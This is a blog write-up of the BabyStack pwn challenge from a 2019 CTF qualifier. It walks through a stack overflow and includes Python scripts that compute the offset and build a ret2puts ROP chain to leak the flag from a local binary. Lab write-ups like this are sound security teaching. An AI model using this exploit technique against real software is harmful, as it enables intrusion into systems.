
CTF PWN Write-up Greek ECSC CTF quals 2019: Babystack (ง'̀-'́)ง (day 82)

 

It's been a while since my last update on this blog; I finally have some time to write up another pwn CTF challenge.

Thanks to my classmate Christos for sharing this challenge. I hope this post helps you understand how to approach it.

The challenge was named BabyStack. It is a 64-bit ELF executable, and the goal is to hijack the program's control flow so that it prints the flag.



Running the binary straight away prints an open error (its read() of a file fails), which tells us that the binary expects an additional file to be present in order to run properly.



Since this is a CTF challenge, I simply created a dummy file called flag to check whether that was the file it expected.



It turned out to be the right file. Now we can see that the binary asks for two inputs: first a "size" and then the "data".



Next, let's load the binary into Ghidra to get more detail about it. Examining the decompiled pseudocode, we can see that the program uses "size" to decide how many bytes of "data" to read.

This is a good sign for an attacker: since we control how many bytes are read into a fixed-size stack buffer, we can overflow the stack and take control of the execution flow.

But notice that before the program shows us those two prompts, it calls a function init(). Let's have a quick look at what happens inside init().




It is pretty straightforward: this function reads the contents of the "flag" file we just created, and if the file does not exist it prints the error we saw the first time we ran the program.

Let's load the program in gdb-peda and debug it to see if we can find anything interesting.







As you can see, I told the program to read 100 bytes and supplied a long cyclic pattern to see whether it causes a segmentation fault.



Looking at the registers at the crash and asking peda for the pattern offset of the value that landed in the return address, we learn that we need to supply 40 bytes of padding before the value that overwrites the saved return address (what ends up in RIP).
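To show where that number comes from rather than just reading it off a screenshot, here is a pure-Python stand-in for peda's `pattern create` / `pattern offset`. This is an added example and not code from the original write-up; only the 40-byte offset and the 100-byte pattern length come from the post, while the simulated stack frame (buffer plus saved rbp = 40 bytes) is an assumption used to model the crash.

```python
"""Added example (not code from the original write-up): a pure-Python stand-in
for gdb-peda's `pattern create` / `pattern offset`, plus a model of the
vulnerable frame so the 40-byte offset is computed instead of eyeballed."""
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
RET_OFFSET = 40  # buffer start -> saved return address (value from the write-up)


def de_bruijn(alphabet: bytes = ALPHABET, n: int = 4):
    """Lazily yield the de Bruijn sequence B(k, n): every n-byte window occurs
    exactly once, so any n bytes read out of a register locate themselves
    uniquely in the pattern (the same construction pwntools' cyclic() uses)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern (peda: `pattern create <length>`)."""
    gen = de_bruijn(ALPHABET, n)
    return bytes(next(gen) for _ in range(length))


def cyclic_find(value, n: int = 4, search_len: int = 20000) -> int:
    """Offset of `value` inside the pattern (peda: `pattern offset <value>`).
    `value` is either the raw bytes or the integer a 64-bit register held; for
    an integer the low n bytes (little-endian) are the ones to look up.
    Returns -1 if the value is not part of the pattern."""
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    return cyclic(search_len, n).find(value[:n])


def simulate_overflow(data: bytes, ret_offset: int = RET_OFFSET) -> int:
    """Model of the vulnerable frame (assumed layout: buffer + saved rbp =
    40 bytes): read(0, buf, size) copies `data` over the buffer, the saved rbp
    and the saved return address.  Returns the qword that ends up in the
    return-address slot, i.e. what `ret` will try to jump to and what gdb shows
    at the crash; 0 if the input never reaches that slot."""
    frame = bytearray(ret_offset + 8)
    count = min(len(data), len(frame))
    frame[:count] = data[:count]
    return struct.unpack_from("<Q", frame, ret_offset)[0]


def find_rip_offset(pattern_len: int = 100) -> int:
    """The whole peda workflow in one call: feed a 100-byte pattern (as in the
    write-up), take the value that reached the return address, look it up."""
    crash_value = simulate_overflow(cyclic(pattern_len))
    return cyclic_find(crash_value)


if __name__ == "__main__":
    print(cyclic(100).decode())
    print("offset to saved return address:", find_rip_offset())
```

Run it and the offset reported is 40, matching the debugger session above. Note that cyclic_find() only needs the low 4 bytes of the register value: on a crash at an invalid return address gdb shows the full 8 bytes, but 4 bytes are already unique within the 26^4-byte pattern.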

The next question is how we get at the flag inside the program.

Still remember the init() function that loads the flag file?

Practically any program that loads a file keeps the retrieved contents somewhere in its memory. We can find out where by putting breakpoints on the open() and read() calls made from init().




Run the program and look at the arguments passed to each of those functions.


At the first breakpoint we can see that the string "./flag" is passed to open().



At the second breakpoint we can see that the contents of the "flag" file will be stored at 0x6010c0, the buffer argument passed to read(). This is a fixed address: the binary is loaded at 0x400000 and is not position independent, so it will be the same on every run.



We can check this location manually with the following command:



So we know the location of the "flag" contents; now it's time to create the exploit.

We need to construct a ROP chain, since NX protection is on (we cannot simply place shellcode on the stack and jump to it), and we want the chain to end up calling the puts() function located at 0x400700.



We also need a gadget to load the argument for puts(); we can find one with the ROPgadget tool.



From the result we get a suitable gadget: pop rdi; ret. Remember that in the x86-64 System V calling convention the rdi register holds the first argument, so popping the flag address into rdi and returning into puts() is equivalent to calling puts(flag).





From all this information we can build the exploit shown above, and once we run it we get the flag :)
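The chain itself, written out in plain Python with struct so it can be inspected without pwntools. This is an added example and not the original exploit script: the puts() address 0x400700, the flag buffer 0x6010c0 and the 40-byte offset come from the write-up, but the `pop rdi; ret` address is not in the text (it was in a ROPgadget screenshot), so POP_RDI_RET is a placeholder to replace with your own ROPgadget output; the binary name and the "size, then data" input format are likewise assumptions.

```python
"""Added example (not the original write-up's exploit): ret2puts ROP chain for
BabyStack built with struct only.  POP_RDI_RET is a placeholder; the binary
name and the size-then-data input format are assumptions."""
import struct
import subprocess

PUTS_PLT = 0x400700     # puts() entry used in the write-up
FLAG_BUF = 0x6010c0     # where init() read() the flag file into (write-up)
RIP_OFFSET = 40         # padding before the saved return address (write-up)
POP_RDI_RET = 0x400000  # PLACEHOLDER (hypothetical): take the real value from ROPgadget


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian qword (pwntools' p64)."""
    return struct.pack("<Q", value)


def build_chain(pop_rdi: int = POP_RDI_RET, align_stack: bool = False) -> bytes:
    """Padding, then: pop rdi; ret -> &flag -> puts.  The pop loads the flag
    address into rdi (first argument) and the ret falls into puts().
    With align_stack the chain first returns into the bare `ret` at pop_rdi + 1
    (the gadget is the two bytes 5f c3), which fixes the 16-byte stack
    alignment that some glibc builds check with a movaps inside puts()/printf()."""
    chain = b"A" * RIP_OFFSET
    if align_stack:
        chain += p64(pop_rdi + 1)
    chain += p64(pop_rdi) + p64(FLAG_BUF) + p64(PUTS_PLT)
    return chain


def decode_chain(chain: bytes, offset: int = RIP_OFFSET) -> list:
    """Read the chain back as a list of qwords after the padding, to eyeball
    the layout before sending it."""
    body = chain[offset:]
    return [struct.unpack_from("<Q", body, i)[0]
            for i in range(0, len(body) - len(body) % 8, 8)]


def newline_positions(chain: bytes) -> list:
    """Offsets of 0x0a bytes.  read(0, buf, size) copies them through, but if
    the data were read with fgets()/gets() the chain would be cut at the first
    one, so this is the check to run when an address happens to contain 0x0a."""
    return [i for i, b in enumerate(chain) if b == 0x0a]


def run_exploit(binary: str = "./babystack", pop_rdi: int = POP_RDI_RET,
                align_stack: bool = False) -> bytes:
    """Drive the local binary: answer the size prompt with the chain length,
    then send the chain itself; puts(&flag) writes the flag to stdout."""
    chain = build_chain(pop_rdi, align_stack)
    proc = subprocess.Popen([binary], stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    out, _ = proc.communicate(str(len(chain)).encode() + b"\n" + chain)
    return out


if __name__ == "__main__":
    chain = build_chain()
    print([hex(a) for a in decode_chain(chain)])
    print("newline bytes at:", newline_positions(chain))
```

If the run segfaults inside puts() instead of printing, retry with align_stack=True: the extra `ret` realigns rsp before puts() is entered. Also note that puts() stops at the first NUL byte, so this only leaks the flag as long as it is a normal text string, which is the case here.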

That's all, I hope you enjoyed this post, and if there is something I missed leave a comment below.

